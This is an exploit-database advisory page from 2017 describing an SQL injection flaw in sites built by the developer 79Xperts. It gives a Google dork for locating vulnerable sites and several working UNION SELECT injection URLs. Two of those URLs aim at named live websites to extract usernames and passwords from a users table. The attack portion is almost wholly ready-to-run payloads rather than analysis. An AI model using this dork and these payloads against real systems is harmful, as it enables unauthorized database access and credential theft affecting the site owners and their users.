9Xperts SQL Injection Vulnerability

2017.05.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: 79Xperts SQL Injection Vulnerability # Google Dork: intext:"Developed by 79Xperts" inurl:.php?id= # Date: 2017-05-06 # Exploit Author: Sh4dow (Bl4ckDays@Gmail.Com) # My Team: Zero Security Group # Vendor Homepage: https://www.79xperts.com # Tested on: Kali Linux --------------------------------------------------------------------------------------- Demo: http://afco.com.sa/products.php?cid=12' http://iurc.edu.pk/photos.php?id=5' Exmple: http://127.0.0.1/index.php?id=-1'+1,2,Group_Concat(user_name,0x3a,password),3+from+users--+ Demo Injection: http://afco.com.sa/products.php?cid=-12%27+UNION+ALL+SELECT+1,2,3,4,5,Group_Concat(user_name,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--+&sid=32&ssid=0 http://iurc.edu.pk/photos.php?id=-5%27+UNION+SELECT+1,Group_Concat(user_name,0x3a,password),3+From+users--+ ---------------------------------------------------------------------------------------- # Greetz : My PC # We Are:Sh4dow - Ghostman - SOLTAN SILENT - R3dC4t And All Member # Iranian Underground Researchers # https://telegram.me/ZeroSecOfficial


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top